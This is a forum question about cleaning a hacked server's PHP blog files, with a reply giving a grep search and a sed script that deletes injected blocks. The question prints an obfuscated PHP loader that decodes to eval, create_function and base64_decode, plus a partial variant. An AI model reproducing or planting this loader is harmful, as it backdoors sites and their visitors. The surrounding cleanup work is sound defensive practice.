find and replace variable data via ssh and grep

I got my server hacked with multiple blogs on it, and am trying to find a string and replace it. This hack is a bit more complex than other ones I’ve encountered because its variable. Some data is however static. here is what I do to find the infected files:

find . | xargs grep -lr "ZXZhbChiYXNlNjRfZGVj" *

which is searching for files that have this injected:

Read More
<?phpcVbHvpF09zNSRuMPElLr= array('6169','6186','6165','6176');$SxaHy7s95ObQQJc6f36EGOm= array('1841','1856','1843','1839','1858','1843','1837','1844','1859','1852','1841','1858','1847','1853','1852');$u2vCEM8399Ax6Tw2y= array('9732','9731','9749','9735','9688','9686','9729','9734','9735','9733','9745','9734','9735');$YKbKBXPFKn8ET3XSsQ48kI5WuXgEia6VL="";if (!function_exists("OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p")){ function OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($fO04QWycV17uAqyjS64dQm23qvS6BIjvmaq3WO6HG327kq,$onb63nZXEkGBMeL7rLoly2h6zbYxleEdsF9mTZ9oaGQML){$y22XerQlngnbDyg7CyDCKnrKBrhh3Sz = '';foreach($fO04QWycV17uAqyjS64dQm23qvS6BIjvmaq3WO6HG327kq as $xrrPI80VeeXIC3F5s9y3mPEN7LV1tkv4){$y22XerQlngnbDyg7CyDCKnrKBrhh3Sz .= chr($xrrPI80VeeXIC3F5s9y3mPEN7LV1tkv4 - $onb63nZXEkGBMeL7rLoly2h6zbYxleEdsF9mTZ9oaGQML);}return $y22XerQlngnbDyg7CyDCKnrKBrhh3Sz;}$AQnCMAhdS9buT = OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($AcVbHvpF09zNSRuMPElLr,6068);$Eg0IMt83iZbOJYNZ = OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($SxaHy7s95ObQQJc6f36EGOm,1742);$yFYrhozl7ymshSHoJf02dTb3VPCJsrkhX8z5nYgkmt = OwA0R2PCF9nABq5nOAr18MTE4xvtFCArY0hGTX8p($u2vCEM8399Ax6Tw2y,9634);$FbaILfyEjiFc3kFDDXNL = $Eg0IMt83iZbOJYNZ('$kaGZZNab6Dw8D4JJtdSBIVvTrZneCYQfZ',$AQnCMAhdS9buT.'('.$yFYrhozl7ymshSHoJf02dTb3VPCJsrkhX8z5nYgkmt.'($kaGZZNab6Dw8D4JJtdSBIVvTrZneCYQfZ));');$FbaILfyEjiFc3kFDDXNL($YKbKBXPFKn8ET3XSsQ48kI5WuXgEia6VL);}?>

However, the arrays are randomly generated, as you can see here in a partial of the code:

<?phppNSU= array('7868','7885','7864','7875');$ARi0VuBPLRN7WHIEO71nzE7UGX9k= array('2235','2250','2237','2233','2252','2237','2231','2238','2253','2246','2235','2252','2241','2247','2246');$uWbB41mot20bGXYdwsStk5TO2DlQDwlninPce1r= array('4815','4814','4832','4818','4771','4769','4812','4817','4818','4816','4828','4817','4818');$rCeok2zh4L1E8X6GuemL4rp7ve3LRhyxJCMT="ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBFWWxaYU5Wa3lNRFZsVm1kNlUyMTRhbEo2YkRWYVJXUnpaRlp3TlZvelp

So it is always within the first <?php tag, so I am wondering if it is possible to search for the infected files using “ZXZhbChiYXNlNjRfZGVj” as a constant, then remove the first instance of <?php and ?> since malicious code is always between that. Not sure if this is even possible though.

Ideas?

Related posts

Leave a Reply

1 comment

  1. Take this file, as filter.sed:

    :t
    /<?php/,/?>/ {                    # For each line between these block markers..
       /?>/!{                         #   If we are not at the end marker
          $!{                         #     nor the last line of the file,
             N;                       #     add the Next line to the pattern space
             bt
          }                           #   and branch (loop back) to the :t label.
       }                              # This line matches the /end/ marker.
       /ZXZhbChiYXNlNjRfZGVj/d;       # If /regex/ matches, delete the block.
    }                                 # Otherwise, the block will be printed.
    

    Then, from the directory in which your PHP files live:

    sed -i -f filter.sed *.php.

    Tip of the hat to this excellent resource.